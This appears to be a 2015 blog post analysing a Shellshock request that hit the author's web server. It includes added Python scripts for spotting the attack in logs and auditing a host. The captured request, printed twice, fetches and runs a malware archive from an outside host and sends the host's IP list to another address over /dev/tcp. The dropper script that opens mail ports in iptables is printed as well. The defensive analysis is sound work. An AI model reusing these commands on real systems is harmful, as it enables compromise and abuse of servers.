Wednesday, 15 April 2015

Unknown pm malware (Samba related)

On 13 April a command-injection attempt hit my web server: a request carrying the Shellshock pattern "() { :;};" in both the Referer and User-Agent headers, whose goal was to download and run Samba-related malware.

46.4.73.171 - - [13/Apr/2015:06:04:07 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\"" "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\""
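As an added example (not code from the original post), the following Python scanner finds lines like the one above in an Apache combined-format access log and pulls out the download host, the /dev/tcp callback target and the directories the payload moves through, so the indicators can be fed into blocking or hunting without reading the raw line by hand. The first sample line is the captured request itself; the second is a constructed benign line. The combined log format is an assumption; other formats need a different line regex.

```python
import re

# Shellshock trigger string: an empty exported function followed by trailing commands.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")

# Apache "combined" log format. Quoted fields may contain \" escapes, so each
# quoted field is matched as a run of (non-quote | backslash-escaped) characters.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<remote>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"$'
)

# Indicator patterns inside the injected command string.
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\s+(?:-\S+\s+)*([^\s;]+)")   # fetched URL
CALLBACK_RE = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d+)")  # bash network redirect
CHDIR_RE = re.compile(r"\bcd\s+([^\s;]+)")                             # working directories
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def _unique(items):
    """Deduplicate while keeping first-seen order."""
    return list(dict.fromkeys(items))


def extract_indicators(payload):
    """Pull download URLs, /dev/tcp callbacks, directories and IPs out of one payload string."""
    payload = payload.replace('\\"', '"')  # undo Apache's quote escaping
    return {
        "download_urls": _unique(DOWNLOAD_RE.findall(payload)),
        "callbacks": _unique((ip, int(port)) for ip, port in CALLBACK_RE.findall(payload)),
        "dirs": _unique(CHDIR_RE.findall(payload)),
        "ips": _unique(IPV4_RE.findall(payload)),
    }


def scan_log(text):
    """Return one finding per log line whose Referer or User-Agent carries a Shellshock payload."""
    findings = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format (or a truncated line): skip rather than crash
        hit_fields = [f for f in ("referer", "agent") if SHELLSHOCK_RE.search(m.group(f))]
        if not hit_fields:
            continue
        finding = {"remote": m.group("remote"), "time": m.group("time"),
                   "request": m.group("request"), "status": m.group("status"),
                   "fields": hit_fields}
        # The captured attempt carried the same payload in both headers; merge either way.
        merged = {"download_urls": [], "callbacks": [], "dirs": [], "ips": []}
        for f in hit_fields:
            for key, values in extract_indicators(m.group(f)).items():
                merged[key] = _unique(merged[key] + values)
        finding.update(merged)
        findings.append(finding)
    return findings


# Sample input: the request captured above, followed by a constructed benign line.
SAMPLE_LOG = r'''
46.4.73.171 - - [13/Apr/2015:06:04:07 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\"" "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\""
203.0.113.5 - - [13/Apr/2015:06:05:00 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (constructed benign line)"
'''.strip()


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["remote"], hit["status"], hit["download_urls"], hit["callbacks"], hit["dirs"])
```

Whether or not the request reached a CGI handler, the payload itself names the infrastructure worth recording: the host the archive is fetched from, the address and port the collected IP list is pushed to, and the two writable directories the dropper tries.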
The g.tgz archive unpacks to a directory z containing two files:
  • pm: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped
  • a: a shell script that records the host's IPv4 addresses, runs pm once per address, and opens TCP ports 25, 587 and 3838 in iptables. Its contents:
# collect every non-loopback IPv4 address of the host into the file "ip"
/sbin/ifconfig |grep inet |grep -v inet6 |grep -v 127.0.0.1 |tr ':' ' ' |awk '{print $3}' >> ip
chmod +x pm
# run pm once per address, passing it the address and port 3838 (pm's options are undocumented; their meaning is not known from the names alone)
for i in `cat ip`
do
./pm -i"$i" -e"$i" -p3838 -d
done
# allow inbound and outbound TCP to the SMTP ports (25, 587) and to port 3838, silently
/sbin/iptables -I OUTPUT -p tcp --dport 25 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 25 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I OUTPUT -p tcp --dport 3838 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 3838 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I OUTPUT -p tcp --dport 587 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 587 -j ACCEPT >/dev/null 2>&1

# prints the resulting ruleset to stdout; nothing here redirects it, so the rules are not persisted by this line
/sbin/iptables-save
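Added example, not code from the original post: a host-side check for the traces this script leaves behind. It takes iptables-save output and a collection of existing paths as plain data so it runs offline against constructed samples; audit_live_host() runs the same checks on the real host (it needs root for iptables-save). Ports 25 and 587 are legitimately open on a mail host, so only the ACCEPT rule for port 3838 and the dropped files are treated as conclusive on their own; that threshold is this example's choice, not something the post states.

```python
import os
import re
import subprocess

# Ports the captured `a` script opens with iptables, and where the payload unpacks.
SUSPECT_PORTS = {25, 587, 3838}
DROP_DIRS = ("/var/tmp", "/var/spool/samba")
DROP_FILES = ("z/pm", "z/a", "z/ip")
CANDIDATE_PATHS = [f"{d}/{f}" for d in DROP_DIRS for f in DROP_FILES]

# One iptables-save rule line. A rule added as `-I INPUT -p tcp --dport N -j ACCEPT`
# is printed as `-A INPUT -p tcp -m tcp --dport N -j ACCEPT`.
RULE_RE = re.compile(r"^-A (?P<chain>INPUT|OUTPUT) .*?-p tcp .*?--dport (?P<port>\d+) .*?-j ACCEPT$")


def find_opened_ports(iptables_save_text):
    """Map each suspect port to the chains that carry an ACCEPT rule for it."""
    hits = {}
    for line in iptables_save_text.splitlines():
        m = RULE_RE.match(line.strip())
        if m and int(m.group("port")) in SUSPECT_PORTS:
            hits.setdefault(int(m.group("port")), set()).add(m.group("chain"))
    return {port: sorted(chains) for port, chains in hits.items()}


def find_dropped_files(existing_paths):
    """Return the dropper's file paths that are present in the given path collection."""
    return sorted(set(CANDIDATE_PATHS) & set(existing_paths))


def audit(iptables_save_text, existing_paths):
    """Combine both checks; 25/587 alone are reported separately because mail hosts open them legitimately."""
    ports = find_opened_ports(iptables_save_text)
    files = find_dropped_files(existing_paths)
    return {
        "opened_ports": ports,
        "dropped_files": files,
        "suspicious": bool(files) or 3838 in ports,
        "mail_ports_open": sorted(p for p in ports if p in (25, 587)),
    }


# Constructed sample: what iptables-save prints after the script's six -I rules were
# inserted into an otherwise empty, default-ACCEPT filter table. Each -I lands at the
# top of its chain, so the rules appear in reverse script order.
SAMPLE_RULES = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 587 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3838 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 25 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 587 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 3838 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 25 -j ACCEPT
COMMIT
"""
# Constructed sample path list: only the /var/tmp copy of the payload is present.
SAMPLE_PATHS = ["/var/tmp/z/pm", "/var/tmp/z/a", "/var/tmp/z/ip", "/var/tmp/unrelated.txt"]


def audit_live_host():
    """Run the audit against the real host (iptables-save requires root)."""
    rules = subprocess.run(["iptables-save"], capture_output=True, text=True, check=False).stdout
    present = [p for p in CANDIDATE_PATHS if os.path.exists(p)]
    return audit(rules, present)


if __name__ == "__main__":
    print(audit(SAMPLE_RULES, SAMPLE_PATHS))
```

Because the script appends to "ip" and never removes it, a z/ip file containing the host's own addresses is the cheapest indicator to check; the iptables rules confirm the script reached its second half.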

For further details please see VirusTotal.